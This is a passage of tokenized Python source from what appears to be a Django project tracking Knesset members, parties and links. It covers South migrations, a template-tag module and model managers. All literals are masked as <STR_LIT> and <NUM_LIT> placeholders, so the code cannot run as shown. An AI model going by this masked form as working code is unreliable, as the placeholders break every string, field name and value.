'<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django import template <EOL> from django . conf import settings <EOL> from django . core . cache import cache <EOL> from links . models import Link <EOL> register = template . Library ( ) <EOL> @ register . inclusion_tag ( '<STR_LIT>' ) <EOL> def object_links ( obj ) : <EOL> l = Link . objects . for_model ( obj ) <EOL> return { '<STR_LIT>' : l , '<STR_LIT>' : settings . MEDIA_URL } <EOL> @ register . inclusion_tag ( '<STR_LIT>' ) <EOL> def object_icon_links ( obj ) : <EOL> "<STR_LIT>" <EOL> key = "<STR_LIT>" % ( obj . _meta . app_label , obj . _meta . module_name , obj . pk ) <EOL> l = cache . get ( key , None ) <EOL> if l is None : <EOL> l = Link . objects . for_model ( obj ) <EOL> cache . set ( key , l , settings . LONG_CACHE_TIME ) <EOL> return { '<STR_LIT>' : l } </s>
<s> import difflib <EOL> from django . core . cache import cache <EOL> from django . db import models , connection <EOL> class KnessetManager ( models . Manager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( KnessetManager , self ) . __init__ ( ) <EOL> self . _current_knesset = None <EOL> def current_knesset ( self ) : <EOL> if self . _current_knesset is None : <EOL> try : <EOL> self . _current_knesset = self . get_query_set ( ) . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> return None <EOL> return self . _current_knesset <EOL> class BetterManager ( models . Manager ) : <EOL> def __init__ ( self ) : <EOL> super ( BetterManager , self ) . __init__ ( ) <EOL> self . _names = [ ] <EOL> def find ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> names = cache . get ( '<STR_LIT>' % self . model . __name__ ) <EOL> if not names : <EOL> names = self . values_list ( '<STR_LIT:name>' , flat = True ) <EOL> cache . set ( '<STR_LIT>' % self . model . __name__ , names ) <EOL> possible_names = difflib . get_close_matches ( <EOL> name , names , cutoff = <NUM_LIT:0.5> , n = <NUM_LIT:5> ) <EOL> qs = self . filter ( name__in = possible_names ) <EOL> ret = range ( qs . count ( ) ) <EOL> for m in qs : <EOL> if m . name == name : <EOL> return [ m ] <EOL> ret [ possible_names . index ( m . name ) ] = m <EOL> return ret <EOL> class PartyManager ( BetterManager ) : <EOL> def parties_during_range ( self , ranges = None ) : <EOL> filters_folded = Agenda . generateSummaryFilters ( ranges , '<STR_LIT>' , '<STR_LIT>' ) <EOL> return self . filter ( filters_folded ) <EOL> class CurrentKnessetPartyManager ( models . Manager ) : <EOL> def __init__ ( self ) : <EOL> super ( CurrentKnessetPartyManager , self ) . __init__ ( ) <EOL> self . _current = None <EOL> def get_query_set ( self ) : <EOL> from mks . models import Knesset <EOL> qs = super ( CurrentKnessetPartyManager , self ) . get_query_set ( ) <EOL> qs = qs . filter ( knesset = Knesset . objects . current_knesset ( ) ) <EOL> return qs <EOL> @ property <EOL> def current_parties ( self ) : <EOL> if self . _current is None : <EOL> self . _current = list ( self . get_query_set ( ) ) <EOL> return self . _current <EOL> class CurrentKnessetMembersManager ( models . Manager ) : <EOL> "<STR_LIT>" <EOL> def get_query_set ( self ) : <EOL> from mks . models import Knesset <EOL> qs = super ( CurrentKnessetMembersManager , self ) . get_query_set ( ) <EOL> qs = qs . filter ( current_party__knesset = Knesset . objects . current_knesset ( ) ) <EOL> return qs <EOL> class MembershipManager ( models . Manager ) : <EOL> def membership_in_range ( self , ranges = None ) : <EOL> if not ranges : <EOL> return <EOL> filter_list = [ ] <EOL> query_parameters = [ ] <EOL> for r in ranges : <EOL> if not r [ <NUM_LIT:0> ] and not r [ <NUM_LIT:1> ] : <EOL> return None <EOL> query_fields = [ ] <EOL> query_parameters = [ ] <EOL> if r [ <NUM_LIT:0> ] : <EOL> query_fields . append ( "<STR_LIT>" ) <EOL> query_parameters . append ( r [ <NUM_LIT:0> ] ) <EOL> if r [ <NUM_LIT:1> ] : <EOL> query_fields . append ( "<STR_LIT>" ) <EOL> query_parameters . append ( r [ <NUM_LIT:1> ] ) <EOL> filter_list . append ( '<STR_LIT>' . join ( query_fields ) ) <EOL> filters_folded = '<STR_LIT>' . join ( filter_list ) <EOL> query = "<STR_LIT>" % filters_folded <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( query , query_parameters ) <EOL> results = cursor . fetchall ( ) <EOL> return [ c [ <NUM_LIT:0> ] for c in results ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> class Migration ( DataMigration ) : <EOL> def forwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> orm . Knesset . objects . get_or_create ( <EOL> number = <NUM_LIT> , <EOL> defaults = { '<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT> ) , <EOL> '<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:16> ) } ) <EOL> def backwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> orm . Knesset . objects . filter ( number = <NUM_LIT> ) . delete ( ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] <EOL> symmetrical = True </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT:200> , blank = True ) , keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:200> , null = True , blank = True ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : 